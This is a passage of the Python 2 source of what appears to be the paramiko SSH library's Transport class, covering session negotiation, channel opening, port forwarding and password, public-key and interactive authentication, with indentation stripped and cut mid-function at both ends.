out = '<ssh.Transport at %s' % hex(long(id(self)) & 0xffffffffL)
if not self.active:
out += ' (unconnected)'
else:
if self.local_cipher != '':
out += ' (cipher %s, %d bits)' % (self.local_cipher,
self._cipher_info[self.local_cipher]['key-size'] * 8)
if self.is_authenticated():
out += ' (active; %d open channel(s))' % len(self._channels)
elif self.initial_kex_done:
out += ' (connected; awaiting auth)'
else:
out += ' (connecting)'
out += '>'
return out
def atfork(self):
"""
Terminate this Transport without closing the session. On posix
systems, if a Transport is open during process forking, both parent
and child will share the underlying socket, but only one process can
use the connection (without corrupting the session). Use this method
to clean up a Transport object without disrupting the other process.
@since: 1.5.3
"""
self.sock.close()
self.close()
def get_security_options(self):
"""
Return a L{SecurityOptions} object which can be used to tweak the
encryption algorithms this transport will permit, and the order of
preference for them.
@return: an object that can be used to change the preferred algorithms
for encryption, digest (hash), public key, and key exchange.
@rtype: L{SecurityOptions}
"""
return SecurityOptions(self)
def start_client(self, event=None):
"""
Negotiate a new SSH2 session as a client. This is the first step after
creating a new L{Transport}. A separate thread is created for protocol
negotiation.
If an event is passed in, this method returns immediately. When
negotiation is done (successful or not), the given C{Event} will
be triggered. On failure, L{is_active} will return C{False}.
(Since 1.4) If C{event} is C{None}, this method will not return until
        negotiation is done. On success, the method returns normally.
Otherwise an SSHException is raised.
After a successful negotiation, you will usually want to authenticate,
calling L{auth_password <Transport.auth_password>} or
L{auth_publickey <Transport.auth_publickey>}.
@note: L{connect} is a simpler method for connecting as a client.
@note: After calling this method (or L{start_server} or L{connect}),
you should no longer directly read from or write to the original
socket object.
@param event: an event to trigger when negotiation is complete
(optional)
@type event: threading.Event
@raise SSHException: if negotiation fails (and no C{event} was passed
in)
"""
self.active = True
if event is not None:
# async, return immediately and let the app poll for completion
self.completion_event = event
self.start()
return
# synchronous, wait for a result
self.completion_event = event = threading.Event()
self.start()
Random.atfork()
while True:
event.wait(0.1)
if not self.active:
e = self.get_exception()
if e is not None:
raise e
raise SSHException('Negotiation failed.')
if event.isSet():
break
def start_server(self, event=None, server=None):
"""
Negotiate a new SSH2 session as a server. This is the first step after
creating a new L{Transport} and setting up your server host key(s). A
separate thread is created for protocol negotiation.
If an event is passed in, this method returns immediately. When
negotiation is done (successful or not), the given C{Event} will
be triggered. On failure, L{is_active} will return C{False}.
(Since 1.4) If C{event} is C{None}, this method will not return until
        negotiation is done. On success, the method returns normally.
Otherwise an SSHException is raised.
After a successful negotiation, the client will need to authenticate.
Override the methods
L{get_allowed_auths <ServerInterface.get_allowed_auths>},
L{check_auth_none <ServerInterface.check_auth_none>},
L{check_auth_password <ServerInterface.check_auth_password>}, and
L{check_auth_publickey <ServerInterface.check_auth_publickey>} in the
given C{server} object to control the authentication process.
After a successful authentication, the client should request to open
a channel. Override
L{check_channel_request <ServerInterface.check_channel_request>} in the
given C{server} object to allow channels to be opened.
@note: After calling this method (or L{start_client} or L{connect}),
you should no longer directly read from or write to the original
socket object.
@param event: an event to trigger when negotiation is complete.
@type event: threading.Event
@param server: an object used to perform authentication and create
L{Channel}s.
@type server: L{server.ServerInterface}
@raise SSHException: if negotiation fails (and no C{event} was passed
in)
"""
if server is None:
server = ServerInterface()
self.server_mode = True
self.server_object = server
self.active = True
if event is not None:
# async, return immediately and let the app poll for completion
self.completion_event = event
self.start()
return
# synchronous, wait for a result
self.completion_event = event = threading.Event()
self.start()
while True:
event.wait(0.1)
if not self.active:
e = self.get_exception()
if e is not None:
raise e
raise SSHException('Negotiation failed.')
if event.isSet():
break
def add_server_key(self, key):
"""
Add a host key to the list of keys used for server mode. When behaving
as a server, the host key is used to sign certain packets during the
SSH2 negotiation, so that the client can trust that we are who we say
we are. Because this is used for signing, the key must contain private
key info, not just the public half. Only one key of each type (RSA or
DSS) is kept.
@param key: the host key to add, usually an L{RSAKey <rsakey.RSAKey>} or
L{DSSKey <dsskey.DSSKey>}.
@type key: L{PKey <pkey.PKey>}
"""
self.server_key_dict[key.get_name()] = key
def get_server_key(self):
"""
Return the active host key, in server mode. After negotiating with the
client, this method will return the negotiated host key. If only one
type of host key was set with L{add_server_key}, that's the only key
that will ever be returned. But in cases where you have set more than
one type of host key (for example, an RSA key and a DSS key), the key
type will be negotiated by the client, and this method will return the
key of the type agreed on. If the host key has not been negotiated
yet, C{None} is returned. In client mode, the behavior is undefined.
@return: host key of the type negotiated by the client, or C{None}.
@rtype: L{PKey <pkey.PKey>}
"""
try:
return self.server_key_dict[self.host_key_type]
except KeyError:
pass
return None
def load_server_moduli(filename=None):
"""
I{(optional)}
Load a file of prime moduli for use in doing group-exchange key
negotiation in server mode. It's a rather obscure option and can be
safely ignored.
In server mode, the remote client may request "group-exchange" key
negotiation, which asks the server to send a random prime number that
fits certain criteria. These primes are pretty difficult to compute,
so they can't be generated on demand. But many systems contain a file
of suitable primes (usually named something like C{/etc/ssh/moduli}).
If you call C{load_server_moduli} and it returns C{True}, then this
file of primes has been loaded and we will support "group-exchange" in
server mode. Otherwise server mode will just claim that it doesn't
support that method of key negotiation.
@param filename: optional path to the moduli file, if you happen to
know that it's not in a standard location.
@type filename: str
@return: True if a moduli file was successfully loaded; False
otherwise.
@rtype: bool
@note: This has no effect when used in client mode.
"""
Transport._modulus_pack = ModulusPack(rng)
# places to look for the openssh "moduli" file
file_list = [ '/etc/ssh/moduli', '/usr/local/etc/moduli' ]
if filename is not None:
file_list.insert(0, filename)
for fn in file_list:
try:
Transport._modulus_pack.read_file(fn)
return True
except IOError:
pass
# none succeeded
Transport._modulus_pack = None
return False
load_server_moduli = staticmethod(load_server_moduli)
def close(self):
"""
Close this session, and any open channels that are tied to it.
"""
if not self.active:
return
self.active = False
self.packetizer.close()
self.join()
for chan in self._channels.values():
chan._unlink()
def get_remote_server_key(self):
"""
Return the host key of the server (in client mode).
@note: Previously this call returned a tuple of (key type, key string).
You can get the same effect by calling
L{PKey.get_name <pkey.PKey.get_name>} for the key type, and
C{str(key)} for the key string.
@raise SSHException: if no session is currently active.
@return: public key of the remote server
@rtype: L{PKey <pkey.PKey>}
"""
if (not self.active) or (not self.initial_kex_done):
raise SSHException('No existing session')
return self.host_key
def is_active(self):
"""
Return true if this session is active (open).
@return: True if the session is still active (open); False if the
session is closed
@rtype: bool
"""
return self.active
def open_session(self):
"""
Request a new channel to the server, of type C{"session"}. This
is just an alias for C{open_channel('session')}.
@return: a new L{Channel}
@rtype: L{Channel}
@raise SSHException: if the request is rejected or the session ends
prematurely
"""
return self.open_channel('session')
def open_x11_channel(self, src_addr=None):
"""
Request a new channel to the client, of type C{"x11"}. This
is just an alias for C{open_channel('x11', src_addr=src_addr)}.
@param src_addr: the source address of the x11 server (port is the
x11 port, ie. 6010)
@type src_addr: (str, int)
@return: a new L{Channel}
@rtype: L{Channel}
@raise SSHException: if the request is rejected or the session ends
prematurely
"""
return self.open_channel('x11', src_addr=src_addr)
def open_forward_agent_channel(self):
"""
Request a new channel to the client, of type
C{"auth-agent@openssh.com"}.
This is just an alias for C{open_channel('auth-agent@openssh.com')}.
@return: a new L{Channel}
@rtype: L{Channel}
@raise SSHException: if the request is rejected or the session ends
prematurely
"""
return self.open_channel('auth-agent@openssh.com')
def open_forwarded_tcpip_channel(self, (src_addr, src_port), (dest_addr, dest_port)):
"""
Request a new channel back to the client, of type C{"forwarded-tcpip"}.
This is used after a client has requested port forwarding, for sending
incoming connections back to the client.
@param src_addr: originator's address
@param src_port: originator's port
@param dest_addr: local (server) connected address
@param dest_port: local (server) connected port
"""
return self.open_channel('forwarded-tcpip', (dest_addr, dest_port), (src_addr, src_port))
def open_channel(self, kind, dest_addr=None, src_addr=None):
"""
Request a new channel to the server. L{Channel}s are socket-like
objects used for the actual transfer of data across the session.
You may only request a channel after negotiating encryption (using
L{connect} or L{start_client}) and authenticating.
@param kind: the kind of channel requested (usually C{"session"},
C{"forwarded-tcpip"}, C{"direct-tcpip"}, or C{"x11"})
@type kind: str
@param dest_addr: the destination address of this port forwarding,
if C{kind} is C{"forwarded-tcpip"} or C{"direct-tcpip"} (ignored
for other channel types)
@type dest_addr: (str, int)
@param src_addr: the source address of this port forwarding, if
C{kind} is C{"forwarded-tcpip"}, C{"direct-tcpip"}, or C{"x11"}
@type src_addr: (str, int)
@return: a new L{Channel} on success
@rtype: L{Channel}
@raise SSHException: if the request is rejected or the session ends
prematurely
"""
if not self.active:
raise SSHException('SSH session not active')
self.lock.acquire()
try:
chanid = self._next_channel()
m = Message()
m.add_byte(chr(MSG_CHANNEL_OPEN))
m.add_string(kind)
m.add_int(chanid)
m.add_int(self.window_size)
m.add_int(self.max_packet_size)
if (kind == 'forwarded-tcpip') or (kind == 'direct-tcpip'):
m.add_string(dest_addr[0])
m.add_int(dest_addr[1])
m.add_string(src_addr[0])
m.add_int(src_addr[1])
elif kind == 'x11':
m.add_string(src_addr[0])
m.add_int(src_addr[1])
chan = Channel(chanid)
self._channels.put(chanid, chan)
self.channel_events[chanid] = event = threading.Event()
self.channels_seen[chanid] = True
chan._set_transport(self)
chan._set_window(self.window_size, self.max_packet_size)
finally:
self.lock.release()
self._send_user_message(m)
while True:
            event.wait(0.1)
if not self.active:
e = self.get_exception()
if e is None:
e = SSHException('Unable to open channel.')
raise e
if event.isSet():
break
chan = self._channels.get(chanid)
if chan is not None:
return chan
e = self.get_exception()
if e is None:
e = SSHException('Unable to open channel.')
raise e
def request_port_forward(self, address, port, handler=None):
"""
Ask the server to forward TCP connections from a listening port on
the server, across this SSH session.
If a handler is given, that handler is called from a different thread
whenever a forwarded connection arrives. The handler parameters are::
handler(channel, (origin_addr, origin_port), (server_addr, server_port))
where C{server_addr} and C{server_port} are the address and port that
the server was listening on.
If no handler is set, the default behavior is to send new incoming
forwarded connections into the accept queue, to be picked up via
L{accept}.
@param address: the address to bind when forwarding
@type address: str
@param port: the port to forward, or 0 to ask the server to allocate
any port
@type port: int
@param handler: optional handler for incoming forwarded connections
@type handler: function(Channel, (str, int), (str, int))
@return: the port # allocated by the server
@rtype: int
@raise SSHException: if the server refused the TCP forward request
"""
if not self.active:
raise SSHException('SSH session not active')
address = str(address)
port = int(port)
response = self.global_request('tcpip-forward', (address, port), wait=True)
if response is None:
raise SSHException('TCP forwarding request denied')
if port == 0:
port = response.get_int()
if handler is None:
def default_handler(channel, (src_addr, src_port), (dest_addr, dest_port)):
self._queue_incoming_channel(channel)
handler = default_handler
self._tcp_handler = handler
return port
def cancel_port_forward(self, address, port):
"""
Ask the server to cancel a previous port-forwarding request. No more
connections to the given address & port will be forwarded across this
ssh connection.
@param address: the address to stop forwarding
@type address: str
@param port: the port to stop forwarding
@type port: int
"""
if not self.active:
return
self._tcp_handler = None
self.global_request('cancel-tcpip-forward', (address, port), wait=True)
def open_sftp_client(self):
"""
Create an SFTP client channel from an open transport. On success,
an SFTP session will be opened with the remote host, and a new
SFTPClient object will be returned.
@return: a new L{SFTPClient} object, referring to an sftp session
(channel) across this transport
@rtype: L{SFTPClient}
"""
return SFTPClient.from_transport(self)
def send_ignore(self, bytes=None):
"""
Send a junk packet across the encrypted link. This is sometimes used
to add "noise" to a connection to confuse would-be attackers. It can
also be used as a keep-alive for long lived connections traversing
firewalls.
@param bytes: the number of random bytes to send in the payload of the
ignored packet -- defaults to a random number from 10 to 41.
@type bytes: int
"""
m = Message()
m.add_byte(chr(MSG_IGNORE))
if bytes is None:
bytes = (ord(rng.read(1)) % 32) + 10
m.add_bytes(rng.read(bytes))
self._send_user_message(m)
def renegotiate_keys(self):
"""
Force this session to switch to new keys. Normally this is done
automatically after the session hits a certain number of packets or
bytes sent or received, but this method gives you the option of forcing
new keys whenever you want. Negotiating new keys causes a pause in
traffic both ways as the two sides swap keys and do computations. This
method returns when the session has switched to new keys.
@raise SSHException: if the key renegotiation failed (which causes the
session to end)
"""
self.completion_event = threading.Event()
self._send_kex_init()
while True:
self.completion_event.wait(0.1)
if not self.active:
e = self.get_exception()
if e is not None:
raise e
raise SSHException('Negotiation failed.')
if self.completion_event.isSet():
break
return
def set_keepalive(self, interval):
"""
Turn on/off keepalive packets (default is off). If this is set, after
C{interval} seconds without sending any data over the connection, a
"keepalive" packet will be sent (and ignored by the remote host). This
can be useful to keep connections alive over a NAT, for example.
@param interval: seconds to wait before sending a keepalive packet (or
0 to disable keepalives).
@type interval: int
"""
self.packetizer.set_keepalive(interval,
lambda x=weakref.proxy(self): x.global_request('keepalive@lag.net', wait=False))
def global_request(self, kind, data=None, wait=True):
"""
Make a global request to the remote host. These are normally
extensions to the SSH2 protocol.
@param kind: name of the request.
@type kind: str
@param data: an optional tuple containing additional data to attach
to the request.
@type data: tuple
@param wait: C{True} if this method should not return until a response
is received; C{False} otherwise.
@type wait: bool
@return: a L{Message} containing possible additional data if the
request was successful (or an empty L{Message} if C{wait} was
C{False}); C{None} if the request was denied.
@rtype: L{Message}
"""
if wait:
self.completion_event = threading.Event()
m = Message()
m.add_byte(chr(MSG_GLOBAL_REQUEST))
m.add_string(kind)
m.add_boolean(wait)
if data is not None:
m.add(*data)
self._log(DEBUG, 'Sending global request "%s"' % kind)
self._send_user_message(m)
if not wait:
return None
while True:
self.completion_event.wait(0.1)
if not self.active:
return None
if self.completion_event.isSet():
break
return self.global_response
def accept(self, timeout=None):
"""
Return the next channel opened by the client over this transport, in
server mode. If no channel is opened before the given timeout, C{None}
is returned.
@param timeout: seconds to wait for a channel, or C{None} to wait
forever
@type timeout: int
@return: a new Channel opened by the client
@rtype: L{Channel}
"""
self.lock.acquire()
try:
if len(self.server_accepts) > 0:
chan = self.server_accepts.pop(0)
else:
self.server_accept_cv.wait(timeout)
if len(self.server_accepts) > 0:
chan = self.server_accepts.pop(0)
else:
# timeout
chan = None
finally:
self.lock.release()
return chan
def connect(self, hostkey=None, username='', password=None, pkey=None):
"""
Negotiate an SSH2 session, and optionally verify the server's host key
and authenticate using a password or private key. This is a shortcut
for L{start_client}, L{get_remote_server_key}, and
L{Transport.auth_password} or L{Transport.auth_publickey}. Use those
methods if you want more control.
You can use this method immediately after creating a Transport to
negotiate encryption with a server. If it fails, an exception will be
thrown. On success, the method will return cleanly, and an encrypted
session exists. You may immediately call L{open_channel} or
L{open_session} to get a L{Channel} object, which is used for data
transfer.
@note: If you fail to supply a password or private key, this method may
succeed, but a subsequent L{open_channel} or L{open_session} call may
fail because you haven't authenticated yet.
@param hostkey: the host key expected from the server, or C{None} if
you don't want to do host key verification.
@type hostkey: L{PKey<pkey.PKey>}
@param username: the username to authenticate as.
@type username: str
@param password: a password to use for authentication, if you want to
use password authentication; otherwise C{None}.
@type password: str
@param pkey: a private key to use for authentication, if you want to
use private key authentication; otherwise C{None}.
@type pkey: L{PKey<pkey.PKey>}
@raise SSHException: if the SSH2 negotiation fails, the host key
supplied by the server is incorrect, or authentication fails.
"""
if hostkey is not None:
self._preferred_keys = [ hostkey.get_name() ]
self.start_client()
# check host key if we were given one
if (hostkey is not None):
key = self.get_remote_server_key()
if (key.get_name() != hostkey.get_name()) or (str(key) != str(hostkey)):
self._log(DEBUG, 'Bad host key from server')
self._log(DEBUG, 'Expected: %s: %s' % (hostkey.get_name(), repr(str(hostkey))))
self._log(DEBUG, 'Got : %s: %s' % (key.get_name(), repr(str(key))))
raise SSHException('Bad host key from server')
self._log(DEBUG, 'Host key verified (%s)' % hostkey.get_name())
if (pkey is not None) or (password is not None):
if password is not None:
self._log(DEBUG, 'Attempting password auth...')
self.auth_password(username, password)
else:
self._log(DEBUG, 'Attempting public-key auth...')
self.auth_publickey(username, pkey)
return
def get_exception(self):
"""
Return any exception that happened during the last server request.
This can be used to fetch more specific error information after using
calls like L{start_client}. The exception (if any) is cleared after
this call.
@return: an exception, or C{None} if there is no stored exception.
@rtype: Exception
@since: 1.1
"""
self.lock.acquire()
try:
e = self.saved_exception
self.saved_exception = None
return e
finally:
self.lock.release()
def set_subsystem_handler(self, name, handler, *larg, **kwarg):
"""
Set the handler class for a subsystem in server mode. If a request
for this subsystem is made on an open ssh channel later, this handler
will be constructed and called -- see L{SubsystemHandler} for more
detailed documentation.
Any extra parameters (including keyword arguments) are saved and
passed to the L{SubsystemHandler} constructor later.
@param name: name of the subsystem.
@type name: str
@param handler: subclass of L{SubsystemHandler} that handles this
subsystem.
@type handler: class
"""
try:
self.lock.acquire()
self.subsystem_table[name] = (handler, larg, kwarg)
finally:
self.lock.release()
def is_authenticated(self):
"""
Return true if this session is active and authenticated.
@return: True if the session is still open and has been authenticated
successfully; False if authentication failed and/or the session is
closed.
@rtype: bool
"""
return self.active and (self.auth_handler is not None) and self.auth_handler.is_authenticated()
def get_username(self):
"""
Return the username this connection is authenticated for. If the
session is not authenticated (or authentication failed), this method
returns C{None}.
@return: username that was authenticated, or C{None}.
@rtype: string
"""
if not self.active or (self.auth_handler is None):
return None
return self.auth_handler.get_username()
def auth_none(self, username):
"""
Try to authenticate to the server using no authentication at all.
This will almost always fail. It may be useful for determining the
list of authentication types supported by the server, by catching the
L{BadAuthenticationType} exception raised.
@param username: the username to authenticate as
@type username: string
@return: list of auth types permissible for the next stage of
authentication (normally empty)
@rtype: list
@raise BadAuthenticationType: if "none" authentication isn't allowed
by the server for this user
@raise SSHException: if the authentication failed due to a network
error
@since: 1.5
"""
if (not self.active) or (not self.initial_kex_done):
raise SSHException('No existing session')
my_event = threading.Event()
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_none(username, my_event)
return self.auth_handler.wait_for_response(my_event)
def auth_password(self, username, password, event=None, fallback=True):
"""
Authenticate to the server using a password. The username and password
are sent over an encrypted link.
If an C{event} is passed in, this method will return immediately, and
the event will be triggered once authentication succeeds or fails. On
success, L{is_authenticated} will return C{True}. On failure, you may
use L{get_exception} to get more detailed error information.
Since 1.1, if no event is passed, this method will block until the
authentication succeeds or fails. On failure, an exception is raised.
Otherwise, the method simply returns.
Since 1.5, if no event is passed and C{fallback} is C{True} (the
default), if the server doesn't support plain password authentication
but does support so-called "keyboard-interactive" mode, an attempt
will be made to authenticate using this interactive mode. If it fails,
the normal exception will be thrown as if the attempt had never been
made. This is useful for some recent Gentoo and Debian distributions,
which turn off plain password authentication in a misguided belief
that interactive authentication is "more secure". (It's not.)
If the server requires multi-step authentication (which is very rare),
this method will return a list of auth types permissible for the next
step. Otherwise, in the normal case, an empty list is returned.
@param username: the username to authenticate as
@type username: str
@param password: the password to authenticate with
@type password: str or unicode
@param event: an event to trigger when the authentication attempt is
complete (whether it was successful or not)
@type event: threading.Event
@param fallback: C{True} if an attempt at an automated "interactive"
password auth should be made if the server doesn't support normal
password auth
@type fallback: bool
@return: list of auth types permissible for the next stage of
authentication (normally empty)
@rtype: list
@raise BadAuthenticationType: if password authentication isn't
allowed by the server for this user (and no event was passed in)
@raise AuthenticationException: if the authentication failed (and no
event was passed in)
@raise SSHException: if there was a network error
"""
if (not self.active) or (not self.initial_kex_done):
# we should never try to send the password unless we're on a secure link
raise SSHException('No existing session')
if event is None:
my_event = threading.Event()
else:
my_event = event
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_password(username, password, my_event)
if event is not None:
# caller wants to wait for event themselves
return []
try:
return self.auth_handler.wait_for_response(my_event)
except BadAuthenticationType, x:
# if password auth isn't allowed, but keyboard-interactive *is*, try to fudge it
if not fallback or ('keyboard-interactive' not in x.allowed_types):
raise
try:
def handler(title, instructions, fields):
if len(fields) > 1:
raise SSHException('Fallback authentication failed.')
if len(fields) == 0:
# for some reason, at least on os x, a 2nd request will
# be made with zero fields requested. maybe it's just
# to try to fake out automated scripting of the exact
# type we're doing here. *shrug* :)
return []
return [ password ]
return self.auth_interactive(username, handler)
except SSHException, ignored:
# attempt failed; just raise the original exception
raise x
return None
def auth_publickey(self, username, key, event=None):
"""
Authenticate to the server using a private key. The key is used to
sign data from the server, so it must include the private part.
If an C{event} is passed in, this method will return immediately, and
the event will be triggered once authentication succeeds or fails. On
success, L{is_authenticated} will return C{True}. On failure, you may
use L{get_exception} to get more detailed error information.
Since 1.1, if no event is passed, this method will block until the
authentication succeeds or fails. On failure, an exception is raised.
Otherwise, the method simply returns.
If the server requires multi-step authentication (which is very rare),
this method will return a list of auth types permissible for the next
step. Otherwise, in the normal case, an empty list is returned.
@param username: the username to authenticate as
@type username: string
@param key: the private key to authenticate with
@type key: L{PKey <pkey.PKey>}
@param event: an event to trigger when the authentication attempt is
complete (whether it was successful or not)
@type event: threading.Event
@return: list of auth types permissible for the next stage of
authentication (normally empty)
@rtype: list
@raise BadAuthenticationType: if public-key authentication isn't
allowed by the server for this user (and no event was passed in)
@raise AuthenticationException: if the authentication failed (and no
event was passed in)
@raise SSHException: if there was a network error
"""
if (not self.active) or (not self.initial_kex_done):
# we should never try to authenticate unless we're on a secure link
raise SSHException('No existing session')
if event is None:
my_event = threading.Event()
else:
my_event = event
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_publickey(username, key, my_event)
if event is not None:
# caller wants to wait for event themselves
return []
return self.auth_handler.wait_for_response(my_event)
def auth_interactive(self, username, handler, submethods=''):
"""
Authenticate to the server interactively. A handler is used to answer
arbitrary questions from the server. On many servers, this is just a
dumb wrapper around PAM.
This method will block until the authentication succeeds or fails,
        periodically calling the handler asynchronously to get answers to
authentication questions. The handler may be called more than once
if the server continues to ask questions.
The handler is expected to be a callable that will handle calls of the
form: C{handler(title, instructions, prompt_list)}. The C{title} is
meant to be a dialog-window title, and the C{instructions} are user
instructions (both are strings). C{prompt_list} will be a list of
prompts, each prompt being a tuple of C{(str, bool)}. The string is
the prompt and the boolean indicates whether the user text should be
echoed.
A sample call would thus be:
C{handler('title', 'instructions', [('Password:', False)])}.
The handler should return a list or tuple of answers to the server's
questions.
If the server requires multi-step authentication (which is very rare),
this method will return a list of auth types permissible for the next
step. Otherwise, in the normal case, an empty list is returned.
@param username: the username to authenticate as
@type username: string
@param handler: a handler for responding to server questions
@type handler: callable
@param submethods: a string list of desired submethods (optional)
@type submethods: str
@return: list of auth types permissible for the next stage of
authentication (normally empty).
@rtype: list
        @raise BadAuthenticationType: if keyboard-interactive authentication
            isn't allowed by the server for this user
@raise AuthenticationException: if the authentication failed
@raise SSHException: if there was a network error
@since: 1.5
"""
if (not self.active) or (not self.initial_kex_done):
# we should never try to authenticate unless we're on a secure link
raise SSHException('No existing session')
my_event = threading.Event()
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_interactive(username, handler, my_event, submethods)
return self.auth_handler.wait_for_response(my_event)
def set_log_channel(self, name):
"""
Set the channel for this transport's logging. The default is
C{"ssh.transport"} but it can be set to anything you want.
(See the C{logging} module for more info.) SSH Channels will log
to a sub-channel of the one specified.
@param name: new channel name for logging
@type name: str
@since: 1.1
"""
self.log_name = name
self.logger = util.get_logger(name)
self.packetizer.set_log(self.logger)
def get_log_channel(self):
"""
Return the channel name used for this transport's logging.
@return: channel name.
@rtype: str
@since: 1.2
"""
return self.log_name
def set_hexdump(self, hexdump):
"""
Turn on/off logging a hex dump of protocol traffic at DEBUG level in
the logs. Normally you would want this off (which is the default),
but if you are debugging something, it may be useful.
        @param hexdump: C{True} to log protocol traffic (in hex) to the log;
C{False} otherwise.
@type hexdump: bool
"""
self.packetizer.set_hexdump(hexdump)
def get_hexdump(self):
"""
Return C{True} if the transport is currently logging hex dumps of
protocol traffic.
@return: C{True} if hex dumps are being logged
@rtype: bool
@since: 1.4
"""
return self.packetizer.get_hexdump()
def use_compression(self, compress=True):
"""
        Turn on/off compression. This will only have an effect before starting
        the transport (i.e. before calling L{connect}, etc). By default,
compression is off since it negatively affects interactive sessions.
@param compress: C{True} to ask the remote client/server to compress
traffic; C{False} to refuse compression
@type compress: bool
@since: 1.5.2
"""
if compress:
self._preferred_compression = ( 'zlib@openssh.com', 'zlib', 'none' )
else:
self._preferred_compression = ( 'none', )
def getpeername(self):
"""
Return the address of the remote side of this Transport, if possible.
This is effectively a wrapper around C{'getpeername'} on the underlying
socket. If the socket-like object has no C{'getpeername'} method,
then C{("unknown", 0)} is returned.
        @return: the address of the remote host, if known
@rtype: tuple(str, int)
"""
gp = getattr(self.sock, 'getpeername', None)
if gp is None:
return ('unknown', 0)
return gp()
def stop_thread(self):
self.active = False
self.packetizer.close()
### internals...
def _log(self, level, msg, *args):
if issubclass(type(msg), list):
for m in msg:
self.logger.log(level, m)
else:
self.logger.log(level, msg, *args)
def _get_modulus_pack(self):
"used by KexGex to find primes for group exchange"
return self._modulus_pack
def _next_channel(self):
"you are holding the lock"
chanid = self._channel_counter
while self._channels.get(chanid) is not None:
self._channel_counter = (self._channel_counter + 1) & 0xffffff
chanid = self._channel_counter
self._channel_counter = (self._channel_counter + 1) & 0xffffff
return chanid
def _unlink_channel(self, chanid):
"used by a Channel to remove itself from the active channel list"
self._channels.delete(chanid)
def _send_message(self, data):
self.packetizer.send_message(data)
def _send_user_message(self, data):
"""
send a message, but block if we're in key negotiation. this is used
for user-initiated requests.
"""
start = time.time()
while True:
self.clear_to_send.wait(0.1)
if not self.active:
self._log(DEBUG, 'Dropping user packet because connection is dead.')
return
self.clear_to_send_lock.acquire()
if self.clear_to_send.isSet():
break
self.clear_to_send_lock.release()
if time.time() > start + self.clear_to_send_timeout:
raise SSHException('Key-exchange timed out waiting for key negotiation')
try:
self._send_message(data)
finally:
self.clear_to_send_lock.release()
def _set_K_H(self, k, h):
"used by a kex object to set the K (root key) and H (exchange hash)"
self.K = k
self.H = h
if self.session_id == None:
self.session_id = h
def _expect_packet(self, *ptypes):
"used by a kex object to register the next packet type it expects to see"
self._expected_packet = tuple(ptypes)
def _verify_key(self, host_key, sig):
key = self._key_info[self.host_key_type](Message(host_key))
if key is None:
raise SSHException('Unknown host key type')
if not key.verify_ssh_sig(self.H, Message(sig)):
raise SSHException('Signature verification (%s) failed.' % self.host_key_type)
self.host_key = key
def _compute_key(self, id, nbytes):
"id is 'A' - 'F' for the various keys used by ssh"
m = Message()
m.add_mpint(self.K)
m.add_bytes(self.H)
m.add_byte(id)
m.add_bytes(self.session_id)
out = sofar = SHA.new(str(m)).digest()
while len(out) < nbytes:
m = Message()
m.add_mpint(self.K)
m.add_bytes(self.H)
m.add_bytes(sofar)
digest = SHA.new(str(m)).digest()
out += digest
sofar += digest
return out[:nbytes]
def _get_cipher(self, name, key, iv):
if name not in self._cipher_info:
raise SSHException('Unknown client cipher ' + name)
if name in ('arcfour128', 'arcfour256'):
# arcfour cipher
cipher = self._cipher_info[name]['class'].new(key)
# as per RFC 4345, the first 1536 bytes of keystream
# generated by the cipher MUST be discarded
cipher.encrypt(" " * 1536)
return cipher
elif name.endswith("-ctr"):
# CTR modes, we need a counter
counter = Counter.new(nbits=self._cipher_info[name]['block-size'] * 8, initial_value=util.inflate_long(iv, True))
return self._cipher_info[name]['class'].new(key, self._cipher_info[name]['mode'], iv, counter)
else:
return self._cipher_info[name]['class'].new(key, self._cipher_info[name]['mode'], iv)
def _set_forward_agent_handler(self, handler):
if handler is None:
def default_handler(channel):
self._queue_incoming_channel(channel)
self._forward_agent_handler = default_handler
else:
self._forward_agent_handler = handler
def _set_x11_handler(self, handler):
# only called if a channel has turned on x11 forwarding
if handler is None:
# by default, use the same mechanism as accept()
def default_handler(channel, (src_addr, src_port)):
self._queue_incoming_channel(channel)
self._x11_handler = default_handler
else:
self._x11_handler = handler
def _queue_incoming_channel(self, channel):
self.lock.acquire()
try:
self.server_accepts.append(channel)
self.server_accept_cv.notify()
finally:
self.lock.release()
def run(self):
# (use the exposed "run" method, because if we specify a thread target
# of a private method, threading.Thread will keep a reference to it
# indefinitely, creating a GC cycle and not letting Transport ever be
# GC'd. it's a bug in Thread.)
# Hold reference to 'sys' so we can test sys.modules to detect
# interpreter shutdown.
self.sys = sys
# Required to prevent RNG errors when running inside many subprocess
# containers.
Random.atfork()
# active=True occurs before the thread is launched, to avoid a race
_active_threads.append(self)
if self.server_mode:
self._log(DEBUG, 'starting thread (server mode): %s' % hex(long(id(self)) & 0xffffffffL))
else:
self._log(DEBUG, 'starting thread (client mode): %s' % hex(long(id(self)) & 0xffffffffL))
try:
try:
self.packetizer.write_all(self.local_version + '\r\n')
self._check_banner()
self._send_kex_init()
self._expect_packet(MSG_KEXINIT)
while self.active:
if self.packetizer.need_rekey() and not self.in_kex:
self._send_kex_init()
try:
ptype, m = self.packetizer.read_message()
except NeedRekeyException:
continue
if ptype == MSG_IGNORE:
continue
elif ptype == MSG_DISCONNECT:
self._parse_disconnect(m)
self.active = False
self.packetizer.close()
break
elif ptype == MSG_DEBUG:
self._parse_debug(m)
continue
if len(self._expected_packet) > 0:
if ptype not in self._expected_packet:
raise SSHException('Expecting packet from %r, got %d' % (self._expected_packet, ptype))
self._expected_packet = tuple()
if (ptype >= 30) and (ptype <= 39):
self.kex_engine.parse_next(ptype, m)
continue
if ptype in self._handler_table:
self._handler_table[ptype](self, m)
elif ptype in self._channel_handler_table:
chanid = m.get_int()
chan = self._channels.get(chanid)
if chan is not None:
self._channel_handler_table[ptype](chan, m)
elif chanid in self.channels_seen:
self._log(DEBUG, 'Ignoring message for dead channel %d' % chanid)
else:
self._log(ERROR, 'Channel request for unknown channel %d' % chanid)
self.active = False
self.packetizer.close()
elif (self.auth_handler is not None) and (ptype in self.auth_handler._handler_table):
self.auth_handler._handler_table[ptype](self.auth_handler, m)
else:
self._log(WARNING, 'Oops, unhandled type %d' % ptype)
msg = Message()
msg.add_byte(chr(MSG_UNIMPLEMENTED))
msg.add_int(m.seqno)
self._send_message(msg)
except SSHException, e:
self._log(ERROR, 'Exception: ' + str(e))
self._log(ERROR, util.tb_strings())
self.saved_exception = e
except EOFError, e:
self._log(DEBUG, 'EOF in transport thread')
#self._log(DEBUG, util.tb_strings())
self.saved_exception = e
except socket.error, e:
if type(e.args) is tuple:
emsg = '%s (%d)' % (e.args[1], e.args[0])
else:
emsg = e.args
